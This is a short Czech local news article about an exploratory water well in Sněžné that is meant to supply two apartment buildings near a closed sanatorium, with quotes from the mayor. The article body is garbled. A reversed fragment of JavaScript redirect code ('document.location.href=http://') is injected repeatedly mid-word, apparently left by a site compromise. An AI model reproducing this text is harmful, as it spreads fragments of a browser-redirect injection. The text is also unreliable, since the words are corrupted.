Rainbow page separator

Práce spojené s novým vrtem budou pokračovat na jaře

Čtvrtek, 12. února 2015

Sněžné

Sněžné / Průzkumný hydrogeologický vrt, v souvislosti s nímž městys zamýšlí zajistit dostatek vody pro obyvatele dvou by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů vedle objektu bývalého sana[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toria na Buch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově kopci u Sněžného, je dostatečně vydatný. Sněžné pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to může přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit k dalším krokům.
„Pokračovat budeme na jaře. Zatím šlo o průzkumný vrt, ale jeho vydatnost je dostatečná. Bude třeba vybudovat propojení, obstarat všechny souhlasy; čeká nás ještě dost práce,“ uvedla starostka Sněžného Anna Havlíková.
Domy jsou zásobovány vodou ze sousední léčebny, ale vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že je zařízení uzavřeno a veškeré náklady na vzorky a provozování byly rozúč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továvány pouze na by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové domy, platba vycházela příliš vysoká. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se vedení Sněžného přiklonilo k možnosti nového samostatného vrtu v blízkosti domů na obecním pozemku. Zatím tamním obyvatelům městys vodu dotuje, aby měli stejnou cenu, jako lidé jinde ve Sněžném.